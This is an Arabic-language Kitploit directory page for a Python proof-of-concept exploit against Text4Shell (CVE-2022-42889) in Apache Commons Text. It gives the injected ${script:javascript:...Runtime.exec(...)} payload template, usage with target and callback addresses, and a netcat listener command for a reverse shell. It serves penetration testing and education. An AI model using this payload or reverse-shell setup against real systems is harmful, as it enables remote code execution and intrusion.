Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
text4shell-exploit — أداة استغلال (PoC) مخصصة مبنية على بايثون تستهدف Text4Shell (CVE-2022-42889)، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في Apache Commons Text الإصدارات < 1.10. | Kitploit
أدوات/GitHubGitHub/syndicate27/text4shell-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubsyndicate27/text4shell-exploit

text4shell-exploit

أداة استغلال (PoC) مخصصة مبنية على بايثون تستهدف Text4Shell (CVE-2022-42889)، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في Apache Commons Text الإصدارات < 1.10.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

text4shell-exploit

استغلال إثبات مفهوم (PoC) مخصص مبني على بايثون يستهدف Text4Shell (CVE-2022-42889)، وهي ثغرة حرجة لتنفيذ الأكواد عن بُعد في Apache Commons Text الإصدارات < 1.10. يستهدف هذا الاستغلال تطبيقات Java المعرضة للخطر التي تستخدم فئة StringSubstitutor مع تفعيل الاستيفاء (interpolation)، مما يسمح بحقن تعبيرات ${script:...} لتنفيذ أوامر نظام عشوائية.

في هذا الإثبات (PoC)، يتم توضيح الاستغلال عبر معامل الاستعلام data؛ ومع ذلك، قد يختلف اسم المعامل المعرض للخطر اعتمادًا على التنفيذ. يجب على المستخدمين تكييف الحمولة (payload) ومسار الطلب وفقًا لمنطق التطبيق المستهدف.

إخلاء مسؤولية: يُقدَّم هذا الاستغلال لأغراض تعليمية واختبار الاختراق المصرح به فقط. استخدمه بمسؤولية وعلى مسؤوليتك الخاصة.

الوصف

هذا استغلال Python3 مخصص لثغرة Apache Commons Text المعروفة باسم Text4Shell (CVE-2022-42889). يتيح تنفيذ الأكواد عن بُعد (RCE) عبر أدوات الاستيفاء غير الآمنة عندما يتم تقييم مدخلات المستخدم ديناميكيًا بواسطة StringSubstitutor.

تم اختباره ضد:

  • Apache Commons Text < 1.10.0
  • تطبيقات Java التي تستخدم استيفاء ${script:...} على مدخلات غير موثوقة

الاستخدام

root@kitploit:~
python3 text4shell.py <target_ip> <callback_ip> <callback_port>

مثال

root@kitploit:~
python3 text4shell.py 127.0.0.1 192.168.1.2 4444

تأكد من إعداد مستمع (listener) على جهازك المهاجم:

root@kitploit:~
nc -nlvp 4444

منطق الحمولة

يقوم السكريبت بحقن:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

يتم إرسال الريل شل (reverse shell) عبر معامل /data باستخدام طلب POST.

تنزيل الأداة